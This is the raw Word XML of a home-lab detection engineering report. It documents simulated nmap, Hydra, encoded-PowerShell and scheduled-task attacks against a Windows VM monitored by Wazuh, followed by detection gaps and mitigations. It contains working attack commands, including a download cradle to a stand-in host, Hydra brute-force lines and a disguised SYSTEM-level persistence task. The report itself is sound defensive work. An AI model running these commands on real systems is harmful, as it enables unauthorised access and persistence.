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rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">Day 4 — Attack Simulation, Detection Validation &amp; Gap Analysis</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Date: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="595959"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">April 23, 2026</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Duration: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="595959"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">~3 hours</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Status: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="595959"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Complete</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Objective</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="595959"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Simulate real attack techniques against the Windows endpoint from Kali Linux, validate that custom detection rules fire correctly, identify detection gaps, and document mitigations. This day completes the detection engineering cycle — rules were written on Day 3, now they get tested against real attacks.</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Lab Setup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Component</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Attacker machine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Kali Linux 2025.2 — IP: 10.0.0.100</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Target machine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Windows 11 Enterprise — IP: 10.0.0.32</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Monitoring</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Wazuh manager real-time alert stream + Discover dashboard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Network scope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All attack traffic stayed within Parallels virtual network (10.0.0.0/24). No external systems targeted.</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Attack 1 — Network Reconnaissance (Nmap)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Tool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Nmap v7.x</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Command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nmap -sV 10.0.0.32</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Ports Discovered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135/tcp (RPC), 139/tcp (NetBIOS), 445/tcp (SMB)</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 Result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NOT DETECTED</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="60"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="thick" w:color="2E75B6" w:sz="12" w:space="4"/>
        </w:pBdr>
        <w:shd w:fill="D6E4F0" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Wazuh is log-based. Windows does not write a Security log event when someone scans its ports from the network. The OS receives packets and responds but generates no audit entry.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="60"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="595959"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">What open ports tell an attacker:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="595959"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Port 445 open = SMB attacks possible (EternalBlue, pass-the-hash, SMB relay, ransomware propagation)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="595959"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Port 135 open = RPC/DCOM lateral movement possible</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="595959"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">No web server, SSH, or RDP exposed publicly</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Attack 2 — Brute Force Authentication (Hydra)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="595959"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Three brute force attempts were made using Hydra with the rockyou.txt wordlist (14 million real passwords from data breaches).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1500"/>
        <w:gridCol w:w="14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Attempt</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Command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Result</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Events Generated</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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Detected</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SMB Brute Force</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hydra -l ronakmishra -P rockyou.txt 10.0.0.32 smb</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Invalid reply — connection rejected at protocol level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0 × Event ID 4625</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No</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RDP Brute Force</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hydra -l ronakmishra -P rockyou.txt 10.0.0.32 rdp</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Account not active for remote desktop</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0 × Event ID 4625</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No</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Simulated (net use)</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PowerShell — 10 failed net use authentications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Full NTLM handshake completed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10 × Event ID 4625</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Yes — Rule 100006 fired twice</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="thick" w:color="2E75B6" w:sz="12" w:space="4"/>
        </w:pBdr>
        <w:shd w:fill="D6E4F0" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Key finding: Modern Windows 11 blocks Hydra at the protocol level before authentication — generating no log events. net use performs a complete NTLM handshake which Windows logs correctly. Rule 100006 fired twice as expected — once per 5-failure threshold breach.</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Attack 3 — PowerShell Execution (Encoded + Download Cradle)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="60" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Encoded Command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Command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powershell -enc SQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0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Decoded Payload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Invoke-WebRequest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Decode Method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echo "[base64]" | base64 -d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 Result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DETECTED — Rule 100002 fired (Level 12)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="60"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="595959"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The attacker encoded a download command in base64 to hide the payload from casual inspection. Rule 100002 detected the -enc flag regardless of payload content. Decoding revealed the intent was to download a second-stage payload.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="100"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="60" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Download Cradle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Command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powershell -Command "Invoke-WebRequest http://malicious-test.com/payload"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 Result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DETECTED — Rule 100003 fired (Level 12)</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Timestamp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11:42:44 — same as Rule 100002 (same attack session)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="60"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="thick" w:color="2E75B6" w:sz="12" w:space="4"/>
        </w:pBdr>
        <w:shd w:fill="D6E4F0" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Analyst note: Both rules fired at the same timestamp (11:42:44) from the same host. Correlating same-timestamp alerts from the same source is a key analyst skill — these are not two separate incidents but one attack seen through two detection lenses.</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Attack 4 — Persistence via Scheduled Task</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="595959"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Created a malicious scheduled task designed to survive reboots and execute on every user login:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0F0F0" w:val="clear"/>
        <w:spacing w:after="40" w:before="40"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">schtasks /create /tn "WindowsUpdateHelper"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0F0F0" w:val="clear"/>
        <w:spacing w:after="40" w:before="40"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  /tr "powershell.exe -enc cGluZyBnb29nbGUuY29t"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0F0F0" w:val="clear"/>
        <w:spacing w:after="40" w:before="40"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  /sc onlogon /ru SYSTEM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Task Name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WindowsUpdateHelper — chosen to blend with legitimate Windows tasks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Trigger</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On every user logon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Run As</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SYSTEM — highest privilege level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Encoded Payload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cGluZyBnb29nbGUuY29t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Decoded Payload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ping google.com (in a real attack: reverse shell or malware loader)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 Result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Event ID 4698 appeared in Discover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Cleanup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schtasks /delete /tn "WindowsUpdateHelper" /f</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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Real-Time Alert Stream</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="595959"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The Ubuntu Wazuh manager terminal captured all attacks in sequence, showing both attacker activity (Kali) and victim detections (Windows) in a single stream:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="60"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0F0F0" w:val="clear"/>
        <w:spacing w:after="40" w:before="40"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">RULE 2902   — Level 7  — Kali: Hydra package installed via apt-get</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0F0F0" w:val="clear"/>
        <w:spacing w:after="40" w:before="40"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">RULE 100006 — Level 12 — Windows: Brute force detected (wave 1)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0F0F0" w:val="clear"/>
        <w:spacing w:after="40" w:before="40"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">RULE 100006 — Level 12 — Windows: Brute force detected (wave 2)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0F0F0" w:val="clear"/>
        <w:spacing w:after="40" w:before="40"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">RULE 100002 — Level 12 — Windows: Encoded PowerShell detected</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0F0F0" w:val="clear"/>
        <w:spacing w:after="40" w:before="40"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">RULE 100003 — Level 12 — Windows: Download cradle detected</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="60"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="595959"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Seeing both the attacker machine (Kali package install) and the victim machine (Windows alerts) in the same stream demonstrates full-spectrum visibility across the environment.</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Detection Results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00"/>
        <w:gridCol w:w="42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Attack</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Tool / Method</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Detected</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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Rule / Event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Network port scan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Nmap -sV</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No</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 gap — needs Suricata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SMB brute force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Hydra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No</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 gap — blocked before auth</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RDP brute force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Hydra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No</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Detection gap — blocked before auth</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Failed logons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net use (native)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Yes</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Rule 100006 (fired twice)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Encoded PowerShell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-enc flag</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Yes</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Rule 100002 (Level 12)</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Download cradle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Invoke-WebRequest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Yes</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Rule 100003 (Level 12)</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Scheduled task persistence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schtasks /create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Yes</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Event ID 4698</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Attacker tool install on Kali</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apt-get install hydra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 Yes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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Rule 2902 (Level 7)</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Detection Gap Analysis</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="595959"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Two significant gaps were identified during simulation. Both are documented with root cause, real-world impact, and recommended mitigations.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="60" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Gap 1 — No Network-Level Visibility (Nmap)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Finding</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Nmap port scans generate zero Wazuh alerts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Windows does not log inbound connection attempts that do not reach the application layer. Port scans are handled at the TCP/IP stack level with no audit event generated.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Attackers can perform complete network reconnaissance — discovering open ports, running services, and OS version — without triggering a single alert. By the time an attack starts, the attacker already knows the full attack surface.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Verified</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Nmap -sV run against 10.0.0.32. Ports 135, 139, 445 discovered. Zero alerts in Wazuh Discover.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="60"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="595959"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Mitigation options:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="595959"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Deploy Suricata IDS and integrate with Wazuh using the native Suricata module — detects scan patterns at packet level, feeds alerts into the same dashboard</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="595959"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Enable Windows Firewall connection logging — captures inbound connection attempts regardless of application-layer handling</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="100"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="60" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Gap 2 — Modern Windows 11 Blocks Hydra Before Logging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Attribute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Finding</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Hydra brute force against SMB (445) and RDP (3389) generates zero Event ID 4625 entries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Root Cause</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Windows 11 enforces stricter protocol handling than older versions. Hydra does not complete the NTLM handshake in a way Windows recognizes as an authentication attempt. No authentication attempt = no authentication failure = no log event.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Impact</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Common brute force tools go completely undetected against modern Windows endpoints on SMB and RDP protocols. Log-based SIEM is blind to this attack vector.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Verified</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Hydra run against SMB and RDP — zero 4625 events. Native net use authentication — 10 × 4625 events, Rule 100006 fired correctly.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="60"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="595959"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Mitigation options:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="595959"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Deploy Suricata network IDS — detects brute force patterns at the packet level before Windows even processes the connection</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="595959"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Enable Windows Firewall connection logging — captures blocked connections regardless of authentication completion</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="595959"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Implement account lockout policy — lock accounts after 5 failures for 30 minutes, stops brute force independent of SIEM detection</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="595959"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Deploy Microsoft Defender for Endpoint — kernel-level visibility catches attacks the Event Log misses</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="60"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="thick" w:color="2E75B6" w:sz="12" w:space="4"/>
        </w:pBdr>
        <w:shd w:fill="D6E4F0" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Broader implication: Log-based SIEM alone is insufficient for complete attack detection. Defense in depth requires network-level monitoring alongside endpoint log collection. A threat actor using tools that avoid triggering Windows authentication events could operate undetected by a Wazuh-only deployment.</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Key Analyst Skills Practiced</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="60" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
